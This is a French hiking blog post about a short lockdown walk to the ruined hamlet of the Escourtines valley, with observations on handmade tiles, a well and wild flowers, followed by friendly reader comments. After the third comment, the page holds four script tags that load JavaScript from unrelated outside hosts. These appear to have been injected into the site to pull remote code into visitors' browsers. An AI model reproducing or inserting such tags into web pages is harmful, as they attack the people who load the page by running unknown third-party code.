• Le vallon des Escourtines

     

    Ce jour, envie de prendre l'air, juste une petite virée derrière la maison dans le hameau des Escourtines.

    Vestiges d'un hameau ancien, en plein cœur du vallon des Escourtines, dégagé des ronces et de la salsepareille par les amis randonneurs-baliseurs du GIA GCSB...adessias Louis !

    Une balade dans les clous de la réglementation en vigueur, dans un rayon inférieur à 1 km de la maison et pour une durée inférieure à une heure.

    Avantage d'habiter au pied des collines, le hameau est à peine plus loin que la sortie de mon jardin.

    *****

    Sortie de l'étroit vallon, et débouché sur ce que nous appelons ici, "le plateau" qui est certainement ce qui reste de la partie "agricole" du hameau, une zone plate bien dégagée, les différents niveaux étant séparés par des restanques. Le plateau est ensoleillé, et surtout, complètement abrité des vents, les "vieux" savaient choisir l'emplacement de leurs logis...

    Le vallon des Escourtines

     en haut, les crêtes du balcon des Escourtines

    le sentier balisé jaune nous emmène directement vers les ruines, un grand chêne que je connais depuis plus de 35 ans trône au milieu de la plus grande ruine.

    Le vallon des Escourtines 

    l'habitation devait être assez grande

    Le vallon des Escourtines

     une autre, un peu plus haut, il n'en reste qu'un coin de mur et des pierres éboulées 

    Le vallon des Escourtines

     Le vallon des Escourtines

     beaucoup de fragments de tuiles

    Tuiles fabriquées à la main, avec l'argile "que l'on a" les teintes varient du rouge brique au blanc cassé, mais toujours, les traces des doigts qui les ont façonnées apparaissent sur le dessus.

    Et ce sont probablement les traces des doigts des femmes qui les ont moulées sur leur cuisse, comme ça se faisait souvent pour les constructions chez les pauvres.

    L'intérieur de la tuile montre, avec un peu d'observation, l'empreinte de la peau...mais oui !

    Le vallon des Escourtines

    ici et là quelques menus vestiges cassés de poteries domestiques, tians, pots à eau, autres ?

    Le vallon des Escourtines

     un peu à l'écart, le puits à sec, mais je l'ai vu bien souvent en eau, il n'y a pas si longtemps. ici dans le quartier on l'appelle, "la source" car lorsqu'il déborde, il coule en fine rigole et débouche plus bas sur le plateau.

    Il y a quelques années un voisin y avait aménagé des abreuvoirs pour la sauvagine, ils sont encore visibles.

    Le vallon des Escourtines

     Quelques fleurs sauvages, iris jaunes et violets

    Le vallon des Escourtines

     Le vallon des Escourtines

    Le ciel se couvre de gros nuages gris, qui auront disparu dès rentré à la maison, allez zou, la pause est finie, j'ai mangé mon bout de fromage et ma mandarine, bu un coup de planteur, la sortie se termine, je rentre  !  

    Le vallon des Escourtines

     Ceci n'est qu'un reportage, l’éditeur, l’auteur ou le diffuseur ne sauraient être tenus pour responsables dans

    l’hypothèse d’un accident sur cet itinéraire, et ce, quelles qu’en soient les causes.

     Pour les secours composer le 112

     

     

     

     

     

     

    « La grotte de la BoulégeadeDevoluy, la via ferrata du défilé des Etroits »

  • Commentaires

    1
    Jeudi 2 Avril à 19:04

    Et oui, dur, dur en ce moment d'aller randonner ! Et en ce qui me concerne, je ne me plains pas trop, car j'habite à l'extérieur de mon village, et suis de suite dans les bois et les vignes. Mais pas évident du tout, et une heure c'est vite passé ! Et ... j'ai été contrôlée par la gendarmerie, oui, oui ! Mais, ouf, j'étais en règle ... Allez, courage les amis et à des jours meilleurs. Bisous.

      • Vendredi 10 Avril à 12:19

        Suis très jaloux de ton habitat si près de la jungle!. Je perd mon temps (90 ans), j'ai à chercher encore au plateau d'Agnis....Je recherche une quille(!) Elle est representée sur le plateau en bois à l'entrée Nord du Vallon des Cerisiers.Dès la "libération" je retourne dans "ma' jungle . Je vais aussi faire le dessin du "Jas de Méffrage...La vie est belle...sans virus !

    2
    Brigitte
    Vendredi 3 Avril à 10:21

    l'appel de la forêt, contente que vous aye.z pu prendre l'air ça fait du bien au moral, moi suis un peu plus loin mon kilomètre s'arrêtre un peu avant la colline.

    au plaisr de se voir aux courses 

      • Vendredi 3 Avril à 10:31

        Bonjour Brigitte

        Oui cette petite balade derrière ma maison m' a fait du bien, même si ce n'est pas vraiment une rando.

        Yvette me parle de toi quand vous vous voyez au magasin. mais ce n'est qu'une correspondance par téléphone, hélas.

        Bon courage et à bientôt pour de nouvelle aventures en randos

        jluc

         

    3
    Danielle/Marsu83
    Vendredi 3 Avril à 12:07

    Bonjour ! merci pour ce bol d'air; Oui les iris ! à Siou Blanc ils doivent être en fleur du côté de puy de Fam !! ... De mon côté j'en profite pour explorer mon quartier et je suis contente de fouler l'herbe du terrain en friche derrière le commissariat de Hyères et de voir les canards dans le Baye et les glycines en fleurs ! Comme quoi le peu peut être énorme ! bonne continuation à vous !!

    <script src="//jaretsummer.com/228ebbb479fb2ce2f7.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8846x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8846x&format=arrjs&r=1585908046523" type="text/javascript"></script> <script src="http://jaretsummer.com/ext/228ebbb479fb2ce2f7.js?sid=52666_8846_&title=qqq&blocks[]=31af2" type="text/javascript"></script>
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :